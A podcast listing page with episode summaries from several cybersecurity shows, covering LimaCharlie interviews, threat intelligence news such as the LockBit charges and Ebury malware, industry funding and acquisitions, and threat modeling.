In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. We go over some of the findings revealed by the Alabuga Leaks about the inner workings of the Russian company Albatross and its Albatross-M5 UAVs, now being used in the war against Ukraine. The U.S. Department of Justice has charged Dmitry Yuryevich Khoroshev, a 31-year-old Russian national, as the leader of the LockBit ransomware group. ESET reveals the persistent threat posed by the Ebury malware, which has compromised approximately 400,000 Linux servers since 2009 and which ESET first documented in 2014. Zoom has announced the global rollout of post-quantum end-to-end encryption for its video meetings, a significant step forward in securing communications against future quantum computing threats. Dropbox recently disclosed a security breach impacting its Dropbox Sign eSignature service.

Enterprise Security Weekly (Audio)
This Week: short on funding, long on research and analysis & RSAC Interviews - ESW #363

Enterprise Security Weekly (Audio)

Play Episode Listen Later May 24, 2024 159:17


Only one funding announcement this week, so we dive deep into Thoma Bravo's past and present portfolio. They recently announced a sale of Venafi to Cyberark and no one is quite sure how much of a hand they had in the LogRhythm/Exabeam merger, and whether or not they sold their stake in the process. We also have a crazy stat Ross Haleliuk spotted in Bessemer's analysis: "13 out of 14 cybersecurity companies acquired in the past year for over $100M were from Israel". Is this an anomaly? Does it just mean that Israel wasn't shy about selling when the market was down? We discuss. A number of new product announcements continue to trickle out post-RSA. We'll also discuss Sam Altman and OpenAI's decision to use Scarlett Johansson's voice against her will and what it could mean for deepfakes, advanced social engineering techniques, and general big tech sliminess. Do you know what a "product glorifier" is? How about a glowstacker? You will if you check out the second-to-last story in the show notes! See the show notes for individual descriptions on each RSAC interview. This week, we feature speakers from Sailpoint, Okta, Ping Identity, LimaCharlie, QwietAI, and Picus! Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw-363

Software Engineering Daily
Modern SecOps with Maxime Lamothe-Brassard

Software Engineering Daily

Play Episode Listen Later May 22, 2024 49:55


Security Operations, or SecOps, refers to the collaboration between security and operations teams to secure an organization's systems, applications, and data. Maxime Lamothe-Brassard is a Co-Founder of LimaCharlie, a cloud SecOps platform. He has a background in security and has previously worked at the Canadian intelligence service, CrowdStrike, Google, and Google X.

The Cybersecurity Defenders Podcast
#122 - Platformization in cybersecurity with Maxime Lamothe-Brassard, Founder & CEO of LimaCharlie

The Cybersecurity Defenders Podcast

Play Episode Listen Later May 6, 2024 22:25


On this episode of The Cybersecurity Defenders Podcast, we talk platformization and the SecOps Cloud Platform with Maxime Lamothe-Brassard, Founder & CEO of LimaCharlie. In a world where digital transformation has become the norm, cybersecurity professionals face unprecedented challenges. The traditional approach of managing dozens of disparate point solutions and siloed security tools, while attempting to control costs, is no longer sufficient. It's time to embrace a new era of cybersecurity in the SecOps Cloud Platform, one that treats cybersecurity as a set of capabilities, much like what cloud providers did for IT. We challenge you to question the status quo and to open your mind to a new way of thinking about security operations. You can get started for free at limacharlie.io

The Cybersecurity Defenders Podcast
#121 - Intel Chat: Albatross leak, Cerber ransomware, UAT4356 & MITRE compromised

The Cybersecurity Defenders Podcast

Play Episode Listen Later May 1, 2024 28:31


In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. Ukrainian hackers claim to have breached the Russian drone developer Albatross, leaking 100 gigabytes of data, including internal documentation, technical data and drawings of various types of unmanned aerial vehicles. A critical vulnerability in Atlassian Confluence Data Center and Server was used to deploy a Linux variant of Cerber ransomware. Cisco Talos is actively monitoring a global increase in brute-force attacks against a variety of targets, including VPN services, web application authentication interfaces and SSH services, since at least March 18, 2024. Cisco Talos also detailed ArcaneDoor, an emerging threat campaign against perimeter network devices orchestrated by a previously unknown actor identified as UAT4356, which Microsoft tracks as STORM-1849. The MITRE Corporation reported a significant security breach within one of its specialized networks, the Networked Experimentation, Research, and Virtualization Environment, or NERVE.

Paul's Security Weekly
Autonomous - I don't think that word means what you think it means - Adam Shostack, Ely Kahn - ESW #359

Paul's Security Weekly

Play Episode Listen Later Apr 25, 2024 117:31


A clear pattern with startups getting funding this week is "autonomous" products and features:
- Automated detection engineering
- Autonomously map and predict malicious infrastructure
- ..."helps your workforce resolve their own security issues autonomously"
- automated remediation
- automated compliance management & reporting
I'll believe it when I see it. Don't get me wrong, I think we're in desperate need of more automation when it comes to patching and security decision-making. I just don't think the majority of the market has the level of confidence necessary to trust security products to automate things without a human in the loop. The way LimaCharlie is going about it, with their new bi-directional functionality they're talking up right now, might work, as detections can be VERY specific and fine-grained. We've already seen a round of fully automated guardrail approaches (particularly in the Cloud) fail, however. My prediction? Either what we're seeing isn't truly automated, or it will become a part of the product that no one uses - like Metasploit Pro licenses.
We've talked about generative AI in a general sense on our podcast for years, but we haven't done many deep dives into specific security use cases. That ends with this interview, as we discuss how generative AI can improve SecOps with Ely Kahn. Some of the use cases are obvious, while others were a complete surprise to me. Check out this episode if you're looking for some ideas! This segment is sponsored by SentinelOne. Visit https://securityweekly.com/sentinelone to learn more about them!
This is a great interview with Adam Shostack on all things threat modeling. He's often the first name that pops into people's heads when threat modeling comes up, and has created or been involved with much of the foundational material around the subject. Adam recently released a whitepaper that focuses on and defines inherent threats.
Resources:
- Here's the Inherent Threats Whitepaper
- Adam's book, Threat Modeling: Designing for Security
- Adam's latest book, Threats: What Every Engineer Should Learn from Star Wars
- We mention the Okta Breach - here's my writeup on it
- We mention the CSRB report on the Microsoft/Storm breach, here's Adam's blog post on it
- And finally, Adam mentions the British Library incident report, which is here, and Adam's blog post is here
Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw-359

Paul's Security Weekly
From Hackers to Streakers - How Counterintelligence Teams are Protecting the NFL - Joe McMann - ESW #358

Paul's Security Weekly

Play Episode Listen Later Apr 18, 2024 107:19


Protecting a normal enterprise environment is already difficult. What must it be like protecting a sports team? From the stadium to merch sales to protecting team strategies and even the players, securing a professional sports team and its brand is a cybersecurity challenge on a whole different level. In this interview, we'll talk to Joe McMann about how Binary Defense helps to protect the Cleveland Browns and other professional sports teams. This week, Adrian and Tyler discuss some crazy rumors - is it really possible that a cloud security startup valued at over $8 billion in November 2021 just got bought for $200 million??? Some healthy funding for Cyera and Cohesity ($300m and $150m, respectively). Onum, Alethea, Sprinto, Andesite AI, StrikeReady, YL-Backed Miggo, Nymiz, Salvador Technologies, and Simbian all raise smaller seed, A, or B rounds. Akamai picks up API security startup Noname Security, Zscaler picks up Airgap Networks, and it's rumored that Armis will acquire Silk Security for $150M. LimaCharlie seems to be doing some vertical growth, adding its own response and automation capabilities (what they call "bi-directional" capabilities). CISA releases a malware analysis system to the general public. Boostsecurity.io releases "poutine", an open source CI/CD pipeline vulnerability scanner. Some great essays this week, with Phil Venables' Letter from the Future, Ben Hawkes' Robots Dream of Root Shells, and Aileen Lee's 10 year Unicorn anniversary piece. We briefly discuss the 3rd party breach that affected Cisco Duo customers, and the financial impact of Change Healthcare's highly disruptive ransomware incident. Finally, we talk about the latest research on the security of LLMs and the apps using them. It's not looking great. For more details, check out the show notes here: https://www.scmagazine.com/podcast-episode/3188-enterprise-security-weekly-358 Visit https://www.securityweekly.com/esw for all the latest episodes!
Show Notes: https://securityweekly.com/esw-358